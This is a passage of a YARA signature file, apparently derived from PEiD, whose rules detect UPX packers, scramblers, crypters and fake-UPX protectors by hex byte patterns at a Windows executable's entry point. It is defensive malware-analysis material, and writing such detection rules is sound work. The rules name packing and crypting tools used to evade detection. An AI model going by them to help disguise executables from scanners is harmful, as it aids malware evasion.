5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 05 FF FF FF 85 C0 0F 84 06 03 00 00 89 85 C5 FE FF FF E8 00 00 00 00 5B B9 31 89 40 00 81 E9 2E 86 40 00 03 D9 50 53 E8 3D 02 00 00 61 03 BD A9 FE FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 09 FF FF FF FF B5 05 FF FF FF 56 57 FF 95 C5 FE FF FF 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB CE 68 00 80 00 00 6A 00 FF B5 C5 FE FF FF FF 95 09 FF FF FF 8D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 EC 01 00 00 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_by_GurueXe: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_099_100_101_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE AE 00 00 00 8D BE 52 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? 60 BE 8D BE 57 83 CD }\r\n        $b = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? 31 DB ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x: PEiD\r\n{\r\n    strings:\r\n        $a = { EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n        $b = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v060_v061_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_06_snaker: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 15 00 00 00 80 34 08 ?? E2 FA E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_040_051_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 21 05 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_083_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0A 03 03 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_LZMA_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_101_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0B 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_090_101_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0B 03 03 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 07 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_7bit_Scrambler_102: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F 83 FA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_094_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 2B 00 00 00 8D BE D5 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE D9 00 00 00 8D BE 27 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 CD FF 31 DB 5E 8D BE FA FF 57 66 81 87 81 C6 B3 01 EB 0A 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC: PEiD\r\n{\r\n    strings:\r\n        $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V3X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v051: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 8D B0 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 D8 01 ?? ?? 83 CD FF 31 DB ?? ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 90 90 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0761_pe_exe_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 F0 01 00 00 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 